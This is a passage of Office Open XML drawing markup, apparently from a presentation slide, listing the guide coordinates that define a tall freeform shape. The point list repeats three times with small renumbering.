              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2958185 h 6858000"/>
